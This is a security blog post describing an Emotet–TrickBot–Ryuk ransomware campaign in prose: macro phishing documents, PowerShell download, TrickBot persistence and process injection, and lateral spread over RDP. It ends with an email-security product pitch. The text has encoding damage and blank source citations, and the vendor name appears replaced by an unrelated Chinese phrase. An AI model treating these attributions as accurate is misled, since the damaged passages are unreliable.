Attack Campaign Using Emotet and TrickBot to Deliver Ryuk Ransomware
An attack campaign is using both the Emotet and TrickBot trojan families to infect unsuspecting users with Ryuk ransomware.
Cybereason鈥檚 research team observed that the campaign begins when a user receives a phishing email that comes with a weaponized Microsoft Office document as an attachment. When the user opens the document, the file asks them to enable macros. Their compliance causes the document to execute a PowerShell command that attempts to download Emotet from a malicious domain.
Some Background Info on Emotet
Active since at least 2014, the Emotet trojan is known for targeting users鈥 banking credentials. But its authors have outfitted Emotet with new techniques over the past few years. Those tactics have included leveraging embedded macros inside XML files disguised as Word documents to increase the likelihood of an infection, as noted by聽, and optimizing their spam campaigns by checking if infected IPs that receive the malicious email are already blacklisted on a spam list, as observed by聽.
There have been even more dramatic changes, as well. Perhaps the most significant is how Emotet has acquired the ability to load additional malware, as documented in an extensive report written by聽. This same functionality informed the decision of the聽聽(CISA) to label Emotet as 鈥渁mong the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors.鈥
Back to the Attack鈥
It鈥檚 therefore no wonder that Emotet behaves as a dropper in the campaign observed by Cybereason. As its researchers explain in a聽:
When the Emotet payload executes, it looks to continue its malicious activity by further infecting and gathering information on the affected machine. It initiates the download and execution of the TrickBot trojan by communicating with and downloading from a pre-configured and remote malicious host.聽
The successful installation of TrickBot marks the second phase of this sophisticated attack campaign. Once it executes on an infected machine, TrickBot creates a scheduled task and a service to achieve persistence. It then reflectively injects its malicious modules into legitimate processes such as svchost so as to avoid detection. One of these modules, module.dll, is capable of stealing data like cookies and URL hits from browsers. Another of its components, vncsrv.dll, enables the malware to actively view and control the victim鈥檚 desktop without them noticing.
For the purposes of this campaign, one of TrickBot鈥檚 most important modules is systemInfo.dll. The trojan uses this unit to collect information about the machine which its attackers can use to determine whether the computer is active in an industry of interest to them. If it is, the attackers install an additional payload and use it to move laterally within the network to assets of interest. They then leverage ping.exe and mstsc.exe (RDP) to test the connection; if the test goes well, they start to spread Ryuk ransomware throughout the network.
Emotet Everywhere
Cybereason isn鈥檛 the only security firm that鈥檚 recently spotted a surge of Emotet infections. Between 11 March and 15 March, 秋葵视频色 observed four Emotet attack waves using malicious .doc files, fake UPS invoices, fake personalized invoices and malicious PDFs to lure in users. The attackers likely thought they could evade detection by using these different delivery models.
But they were wrong. Despite the the attackers鈥 best efforts, 秋葵视频色Protect blocked all of the samples by filtering out the emails based on their phrases, IPs and patterns. Some of these filters go back to as far as November of聽2017.
Email security is no joke when there are campaigns such as the one described above targeting important business assets. That鈥檚 why organizations should go with a sophisticated email security solution that analyzes emails on multiple levels while allowing legitimate correspondence to make their way through.
.